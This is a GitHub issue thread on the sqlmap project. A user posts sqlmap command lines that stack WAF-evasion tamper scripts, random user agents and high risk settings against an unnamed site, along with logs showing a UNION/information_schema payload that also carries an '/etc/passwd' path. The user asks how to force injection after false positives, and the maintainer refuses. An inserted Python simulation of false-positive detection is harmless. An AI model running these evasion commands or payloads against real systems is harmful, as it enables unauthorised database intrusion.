sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

any way to inject it again #1179

Closed ashee69 closed 9 years ago

ashee69 commented 9 years ago

Hello team, tell me if the target is WAF protected. First I got a false injection this way:

```
sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 2 --force-ssl --threads=10
```

```
{1.0-dev-ee11292}
[17:40:12] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[17:40:41] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[17:47:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:47:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
```

And at last I got this:

```
[17:48:59] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[17:49:01] [WARNING] false positive or unexploitable injection point detected
[17:49:01] [WARNING] GET parameter 'id' is not injectable
```

Then I tried some more ways:

```
sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 3 --force-ssl --dbs --threads=10 --level=5 --risk=3 --technique=T --dbms=mysql
```

```
[18:29:38] [WARNING] GET parameter 'id' is not injectable
[18:29:38] [PAYLOAD] sqlmap/1.0-dev-ee11292 (http://sqlmap.org))').,')'("
[18:29:41] [WARNING] heuristic (basic) test shows that User-Agent parameter 'User-Agent' might not be injectable
[18:32:46] [INFO] User-Agent parameter 'User-Agent' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT - comment)' injectable
[18:33:11] [WARNING] false positive or unexploitable injection point detected
[18:33:11] [WARNING] User-Agent parameter 'User-Agent' is not injectable
```

Why the parameter 'User-Agent'????

Then I put in all generally used tamper scripts:

```
sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --dbms=mysql --fresh-queries --parse-error --flush-session --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

So the result is:

```
[18:45:56] [WARNING] false positive or unexploitable injection point detected
[18:45:56] [WARNING] GET parameter 'id' is not injectable
[18:45:56] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
[18:45:56] [WARNING] HTTP error codes detected during run: 414 (Request-URI Too Long) - 104 times
[18:45:56] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
```

Tried with --random-agent:

```
sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --dbms=mysql --fresh-queries --parse-error --random-agent --flush-session --tamper=between
```

Not injectable at all:

```
[20:31:21] [WARNING] GET parameter 'id' is not injectable
```

Can you tell me some more ways to test, or whether it is not injectable? Thank you.

giveen commented 9 years ago

Have you tried running --identify-waf?

ashee69 commented 9 years ago

The new tool itself asks me at the beginning whether to identify the WAF, so I don't think this command can do anything different. Gonna run it again with it.

giveen commented 9 years ago

I've noticed that at the beginning of the run, if it asks, it will almost never "find it", but if you tell it to --identify-waf, it will run the scripts and find out which one it is.

ashee69 commented 9 years ago

NO WAF

```
[00:05:31] [DEBUG] declared web page charset 'utf-8'
[00:05:31] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
[00:05:31] [PAYLOAD] VPyO=5304 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2 NOT BETWEEN 0 AND 1-- ../../../etc/passwd
[00:05:36] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[00:05:36] [DEBUG] checking for WAF/IDS/IPS product 'FortiWeb Web Application Firewall (Fortinet Inc.)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'SEnginx (Neusoft Corporation)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Deny All Web Application Firewall (DenyAll)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Varnish FireWall (OWASP) '
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'BIG-IP Application Security Manager (F5 Networks)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Anquanbao Web Application Firewall (Anquanbao)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Sucuri WebSite Firewall'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Yunjiasu Web Application Firewall (Baidu)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Palo Alto Firewall (Palo Alto Networks)'
[00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'SecureIIS Web Server Security (BeyondTrust)'
[00:05:47] [DEBUG] declared web page charset 'iso-8859-1'
[00:05:47] [DEBUG] got HTTP error code: 501 (Method Not Implemented)
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'BlockDoS'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'EdgeCast WAF (Verizon)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product '360 Web Application Firewall (360)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'ExpressionEngine (EllisLab)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Safedog Web Application Firewall (Safedog)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Profense Web Application Firewall (Armorlogic)'
[00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'ISA Server (Microsoft)'
[00:05:49] [DEBUG] got HTTP error code: 400 (Bad Request)
[00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[00:05:50] [DEBUG] page not found (404)
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Airlock (Phion/Ergon)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'UrlScan (Microsoft)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'ASP.NET RequestValidationMode (Microsoft)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'IBM WebSphere DataPower (IBM)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'dotDefender (Applicure Technologies)'
[00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[00:05:50] [WARNING] no WAF/IDS/IPS product has been identified
```

ashee69 commented 9 years ago

So I continued the test and got this result. My request:

```
sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 3 -u --dbs --threads=10 --level=2 --risk=2 --skip-urlencode --identify-waf
```

And the result:

```
[01:05:23] [WARNING] HTTP error codes detected during run: 400 (Bad Request) - 1 times, 404 (Not Found) - 1 times, 501 (Not Implemented) - 1 times
[01:05:23] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
```

stamparm commented 9 years ago

How did you conclude "NO WAF" from "[00:05:50] [WARNING] no WAF/IDS/IPS product has been identified"????

Is identification the same as existence???

You have a false positive and now you want to force the target to be injectable. Please don't open any new issues like this one.
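Why a time-based probe can report "seems to be injectable" once and then be retracted as a false positive, shown as a simplified model added here (not sqlmap's code): the fake target, its latency schedules and both detector functions are constructed for the illustration, and the probe only asks for a delay, no SQL is involved.

```python
from dataclasses import dataclass, field
from typing import Dict, List

SLEEP = 5.0       # delay the time-based probe asks the target for (seconds)
THRESHOLD = 4.5   # a genuine delay must show up almost in full (seconds)

# Constructed latency schedules, not measurements from any real host.
NOISY_SCHEDULE = [0.31, 6.40, 0.28, 0.30, 0.29, 0.33, 0.30, 0.32]  # one spike, never sleeps
QUIET_SCHEDULE = [0.30, 0.29, 0.31, 0.30, 0.28, 0.32]              # steady, honours the sleep


@dataclass
class FakeTarget:
    """Stand-in for a web endpoint: replays a latency schedule and, only if
    `vulnerable`, adds the requested delay the way a time-based-blind bug would."""
    latencies: List[float]
    vulnerable: bool = False
    calls: int = field(default=0, init=False)

    def request(self, delay_requested: float = 0.0) -> float:
        base = self.latencies[self.calls % len(self.latencies)]
        self.calls += 1
        return base + (delay_requested if self.vulnerable else 0.0)


def naive_check(target: FakeTarget) -> bool:
    """One control, one delayed probe: a single latency spike reads as a hit."""
    control = target.request(0.0)
    delayed = target.request(SLEEP)
    return delayed - control >= THRESHOLD


def confirmed_check(target: FakeTarget, rounds: int = 3) -> bool:
    """Repeat the control/delayed pair and demand the gap on every round, so a
    spike that fooled round one is retracted by round two."""
    for _ in range(rounds):
        control = target.request(0.0)
        delayed = target.request(SLEEP)
        if delayed - control < THRESHOLD:
            return False
    return True


def demo() -> Dict[str, bool]:
    """Fresh targets for each detector so every run starts at the schedule's head."""
    return {
        "noisy_naive": naive_check(FakeTarget(NOISY_SCHEDULE)),
        "noisy_confirmed": confirmed_check(FakeTarget(NOISY_SCHEDULE)),
        "quiet_naive": naive_check(FakeTarget(QUIET_SCHEDULE, vulnerable=True)),
        "quiet_confirmed": confirmed_check(FakeTarget(QUIET_SCHEDULE, vulnerable=True)),
    }
```

The noisy target trips the naive detector on its one spike and is then cleared by the repeated comparison; the steady vulnerable target passes both, which is the distinction the "false positive or unexploitable injection point detected" warning encodes.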

hussein391 commented 7 years ago

Try using `--batch --level=3 --risk=3 --random-agent`.